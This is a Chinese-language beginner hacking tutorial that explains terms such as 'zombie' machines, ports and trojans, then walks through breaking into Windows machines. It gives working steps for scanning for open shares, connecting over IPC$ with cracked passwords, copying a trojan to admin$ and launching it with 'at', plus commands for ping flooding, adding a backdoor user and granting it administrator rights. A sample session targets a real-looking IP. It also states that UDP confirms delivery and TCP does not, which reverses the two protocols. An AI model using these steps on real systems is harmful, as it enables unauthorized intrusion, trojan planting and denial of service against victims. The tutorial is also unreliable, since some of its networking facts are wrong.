黑客入门
什么是肉鸡?
对于刚刚接触网络技术的菜鸟们,看到文章后,里面是不是常常提到肉鸡?其实肉鸡这个名词很好“肉鸡“简单理解为具有可以被入侵的机子也就是“被入侵者”(可以说是受害者,入侵者不会便宜肉鸡的),一般肉鸡是存有漏洞,才会被入侵的,被种了木马也是肉鸡,相信你有一点理解了吧,在以后的入侵中,“肉鸡”这个名词你自己会明白的。
什么是3389肉鸡
“3389肉鸡”是指开了网络端口:3389的机子,而这只机子正好可以入侵,所以可以叫3389肉鸡,虽然我的解释还不是那么的详细和清楚,它的概念可以怎么理解,到时你接触到它,你就会理解。
什么是端口?
端口是上网必备的,每个端口都有特殊的意义,如80端口,是我们浏览网页必备的,QQ也是要端口的,如果没有端口,我们就无法通信,以后我再加详细介绍。
什么是IP
IP可以说是每台机子的地址,就想每个家都有地址这样,在网上,IP是每台机子的地址,你可以通过查询IP,得到那个人在那里上网。当然IP也可以是冒充的,这我就暂时不介绍了,为了使Internet上的众多电脑主机在通信时能够相互识别,Internet上的每一台主机都分配有一个唯一的32位地址,该地址称为IP地址,也称作网际地址。IP地址由4个数组成,每个数可取值0~255,各数之间用一个点号“.”分开(如:202.103.8.46)。事实上,每个IP地址都是由网络号和主机号两部分组成的。网络号表明主机所联接的网络,主机号标识了该网络上特定的那台主机。如:上例中202.103是网络号,8.46是主机号
什么是特洛伊木马?
“特洛伊木马”(trojan horse)简称“木马”,据说这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈的大木马,假装作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全城饮酒狂欢。到午夜时分,全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌入,部队里应外合,焚屠特洛伊城。后世称这只大木马为“特洛伊木马”。如今黑客程序借用其名,有“一经潜入,后患无穷”之意。
完整的木马程序一般由两个部份组成:一个是服务器程序,一个是控制器程序。“中了木马”就是指安装了木马的服务器程序,若你的电脑被安装了服务器程序,则拥有控制器程序的人就可以通过网络控制你的电脑、为所欲为,这时你电脑上的各种文件、程序,以及在你电脑上使用的
帐号、密码就无安全可言了。
木马程序不能算是一种病毒,但越来越多的新版的杀毒软件,已开始可以查杀一些木马了,所以也有不少人称木马程序为黑客病毒
在网络时代,一台没有连接到因特网的电脑只能被称做信息的孤岛。作为一名网民,在享受冲浪之乐时就要学会几招保护自己的技术。端口是个人电脑通往因特网世界的桥梁,只要我们掌握了监控端口的技术,就可以及时发现自己电脑中的安全隐患.
学过硬件设备知识的朋友一定都知道端口这个概念。电脑往往通过端口与外设进行通信,比如我们常见的并口、串口都可以称为端口。但是在网络上的端口只是一个软件形式上的概念,互联网上一台电脑要进行多种服务如电子邮件、Web浏览等,为了让多种服务同时进行,便引入了端口这个概念。
各种服务采用不同的端口,分别提供不同的服务,比如:WWW采用80端口,FTP采用21端口等。这样,通过不同端口,计算机与外界进行互不干扰的通信。
根据提供服务类型的不同,端口分为两种:一种是TCP端口;另一种是UDP端口。计算机之间相互通信的时候,又分为两种方式:一种是发送信息以后,可以确认信息是否到达,也就是有应答的方式,这种方式大多采用UDP协议;一种是发送以后就不管了,不去确认信息是否到达,这种方式大多采用TCP协议。对应这两种协议的服务提供的端口,也就分为UDP端口和TCP端口说到这儿,就要理论结合实践一下了。笔者推荐一款网络端口查看器供你使用,你可去https://www.doczj.com/doc/2f13389517.html,/soft/1/30/2006/20060604380.html下载。笔者在自己的电脑上打开了两款即时通信软件──QQ与MSN。然后进行扫描就可以发现QQ使用的是UDP4000端口,而MSN则是使用TCP1474及1480端口(图1)。由此联想以前笔者遇到过MSN发消息对方收不到的情况,原来MSN使用的是TCP协议。TCP消息发出去后就不管了,而UDP则还要确认一下是否收到。细心的读者可以发现,使用MSN发消息很快,而有时用QQ发送消息则比较慢,这就是因为QQ还要等待对方的应答消息,另外从这个软件中我们也可以看出端口的编号是到65535为止。有兴趣的读者不妨多多使用这款软件,进一步了解常用网络通信软件的通信端口(比如Netmeeting等)。
扫描之木马种植
我建议新手用“啊D网络工具包”,它是一个傻瓜化工具。20CN的扫描器也不错,只有十几K大小。
“啊D网络工具包”里有个“肉鸡查找”,如果你的系统是98/ME的话,那你黑客就别学了,去买windows2000系统的光盘来装吧(盗版的也可以,因为便宜,跟正版没什么区别)。“木马种植”不支持98/ME版。“啊D网络工具包”是新手学习的辅助工具
。关于它的教程,你去下载,有动画教程哦。下载地址:我等下会说。
啊D网络工具包和教程下载地址:
你去https://www.doczj.com/doc/2f13389517.html,/harcksafe.htm 里面看看,里面有很多黑客学习的站点,也有黑客教程,里面就有“啊D网络工具包”使用的教程
下载地址https://www.doczj.com/doc/2f13389517.html,/soft/25/2006/20060605409.html
“木马种植”解释
总之就是把木马复制到别的机子,然后在别的机子上运行木马。
什么是”傻瓜化“工具
就是一个用起来,容易懂,简单操作的工具。
网络上的攻击方法层出不穷,但对于那些想当黑客的初学者而言,利用netbios入侵是首选的入侵方式。可以说网上有关netbios的文章多如牛毛!可是针对初学者的实用性强的文章却不太多,比如大多数此类文章对网 络设置都没好好讲过,使许多初学者至今都没成功入侵过。
入侵前的准备:一台用modem上网的家庭电脑(保证自己有充分的支配权进行研究),操作系统最好是使用win98,再加一个可以显示IP的QQ,还要有一个搜索网络共享肉鸡的好软件,在这里推荐大家使用国产黑客软件“网络刺客II”。
共享入侵的流程:
1.检查一遍自己的网络设置是否符合入侵要求
有相当多的初学者不能成功入侵共享机器就是因为没有正确设置网络环境:因为win98默认安装时并没有安装“文件与共享服务”,所以不能进行共享访问。请先检查爱机有没有网络邻居,如果没有就依次进入“控制面板”→“网络”,选中“Microsoft 网络用户”为主网络登录方式,然后点击“文件及打印共享”这一按键 ,再选中“允许其它用户访问我的文件”,最后按确定后按提示放入win98安装光盘进行补装。重启后你会发现你的桌面上多了个网络邻居。接下来我们再依次点击“我的电脑”→“拨号网络”的“服务器类型”标签,选 中“登录网络”这一项并选上“NetBEUI"协议(因为“登录网络”很影响拨号速度,大部分人都早把它取消了, 这也是最易被忽略的共享设置)。经过这样的设置,我们就可以远程访问共享计算机了。注:设置共享不需要网卡。
2.搜索Internet上的共享机器
再一次吐血推荐著名的国产黑客软件“网络刺客II”,推荐它的原因是它有着非常强大的搜索互联网上的共享主机的功能,并且容易上手(请支持国产软件!)。我们首先要有一些有效的IP地址作为搜索条件,现在我们就打开先前已下载好的完美版QQ吧,在你的QQ好友里随便选个IP地址,然后打开“主机资源”→“搜索共享主机”,输入IP的搜索范围,比如你获得的IP为888.888.888.888(乱写的),你只要在起始地址里输入888.888.888.1,终止地址会自动填上888.888.888.25
5,最后按开始搜索,等上几分钟就会有一大把肉鸡的列表显示出来了。(如果没有的话就换个IP搜索)
3.入侵方式
入侵方法有好几种,这里我推荐两种最简单的入侵方式:一种是直接在“开始”→“运行”里输入\\IP(这个IP就是肉鸡的IP,注意“\\”不能少!)并回车,然后再过几十秒左右就会出现那台主机所有的共享目录,这 时你就可以进行访问了,如果你顺利访问C盘,就再试试能不能在里面创建一个文件,如果能的话,恭喜你!这是一台完全共享C盘的主机,对于这样的主机,我们可以用木马来完全获得它的控制权,其具体操作分两种情况 ,这方面在以下一节中详细讲解。还有一种方式是利用“网络刺客II”进入共享主机,方法也很简单,在列出的共享主机列表中选中一台主机的共享目录,右击出现一菜单,点中“映射成网络硬盘”,过一会软件就会提示映射成功,接下来就快进入“我的电脑”看看战果吧。随着入侵次数的增多,你可能会常遇到设有共享密码的目录,这种情况你就必须输对共享密码才能访问到共享目录.
入侵了:开始.
1:NET 命令
只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!
这里我们假如你得到的用户是bx(计算机登陆的帐号,每只计算机都有),密码是123456。假设对方IP为127.0.0.1
net use \\127.0.0.1\ipc$ "123456" /user:"bx"
退出的命令是
net use \\127.0.0.1\ipc$ /delete
这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.
net use z:\\127.0.0.1\c$
这样你打开本地(自己计算机)的Z盘,就会看到对方的C盘喽。
学到这里就好,以后还会再介绍
对了,要与对方的电脑进行连接,一般首先会先用 net use \\127.0.0.1\ipc$ "密码(没密码就不用打进去)" /user:"用户名",
不然是不能进行对对方电脑进行连接哦。
IPC$简单理解
“IPC连接”简单理解为:net use \\IP\ipc$ "密码" /user:"用户"。不要讲太深。
net use z:\\IP\c$ 映射对方的C盘,为本地Z盘。其中c$是对方盘符名,如果对方的盘符为123,那么就要输入:net use z:\\IP\123。一般情况下,C盘的默认盘符为c$,D盘为D$,依次类推。
需要系统:Windows 2000 (Windows 98 不可以进行入侵!)
用扫描器扫描存有ipc漏洞的机子,推荐软件:流光 (请大家到小榕的网站里下载:https://www.doczj.com/doc/2f13389517.html,)
以下为一次入侵过程:
* 注意:“*”后的文字均为注释。
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-1998 Microsoft Corp.
D:\>net use \\211.21.253.166\IPC$ "" /user:"123"
命令成功完成。
* 这是我用流光扫到的密码~~~我们就拿它开刀吧~!
D:\
>copy 111(木马).exe \\211.21.253.166\admin$
已复制 1 个文件。
* 先复制111.exe上去。
D:\>net time \\211.21.253.166 。
\\211.21.253.166 的当前时间是 2001/1/17 上午 10:48
命令成功完成。
* 查查时间
D:\>at \\211.21.253.166 10:50 111.exe
新加了一项作业,其作业 ID = 1
* 用at命令启动111.exe吧~!(这里设置的时间要比主机时间快)然后去论坛灌几篇帖子。
D:\>net time \\211.21.253.166
\\211.21.253.166 的当前时间是 2001/1/17 上午 10:51
命令成功完成。
* 再查查够时间没有?!噢~~够了~你的木马就运行了。
D:\>copy 111(木马).exe \\211.21.253.166\admin$
已复制 1 个文件。
说明:是把本地D盘里的111.exe 复制到对方机子的admin$(c:\winnt\system里)
如果111.exe在c盘,就要输入:
c:\>copy 111(木马).exe \\211.21.253.166\admin$
如果要把木马(木马在D盘)复制到对方的C盘里,就要输入:
d:\>copy 111(木马).exe \\211.21.253.166\c$(c$对方盘符)
at命令
拷贝(复制的意思)到对方电脑后,要让木马运行,就要输入:
D:\>at \\对方IP 10:50 111.exe
意思是说在对方10:50运行111.exe
要想得出对方的时间就要用到net time命令,
得出时间后,要比得出的时间至少多1分钟。例如:得出时间是10:49,就要输入at \\对方IP 10:50(比10:49多就好,至少1分钟),如果木马在对方D盘里,就要输入at \\对方ip 时间 d:\木马(如果木马在D盘的子目录里,就要输入:
at \\对方ip 时间 d:\目录\木马 依次类推)
winnt命令大全
win2000网络命令初步
====================
1】ping
用来测试网络是否建立连接,获取ip地址,也可以用来攻击
ping -l 65500 -t 127.0.0.0『对某个地址连续发送大小为65500大小的数据包,一直到它死机,对98使用较好
2】netstat -a
查看自己开的端口,常常用来手工查看是否中了木马,或者黑客程序
3】netstat -n
查看自己机器正在和哪些机器的哪个端口进行连接
4】ftp
文件传送协议命令,与对方机器连接后上传和下载文件
下载对方的东西的格式:
get *.* c:\
上传文件:
put c:\*.*
5】net use
1 ipc$连接
net use \\127.0.0.1\ipc$ "123" /user:"admin"
密码为123 用户名 admin
2 退出ipc$
net use \127.0.0.1\ips$ /delte
3 把对方的共享的文件夹映射
net use z: \\127.0.0.1\c$
6】net time
查看对方时间
net time \\127.0.0.1
7】指定时间运行对方机器中的程序
at \\127.0.0.1 12:30 *.exe
8】telnet
与对方做远程连接
一般需要用户名和密码,你在它的机器安装了木马就简单了
telnet 【ip】 【端口】
9】net user
添加用户命令
net user netdemon 123 /add
添加一个用户名为netdemon密码为123的用户
激活guest
netuser guest /active:yes
10
】提升权限
net localgroup administrators netdemon /add
把netdemon提升为管理员
11】net start
查看机器开放的服务
可以启动服务
net start telnet
启动telnet服务
12】net stop
停止服务
net stop telnet
用来关闭服务
13】iisreset /reboot
重启机器2k
14】finger
查看对方最近有那些用户登陆用来得到对方的用户名
figer username @host
15】ipconfig
查机器有多少网卡:查看本机器ip地址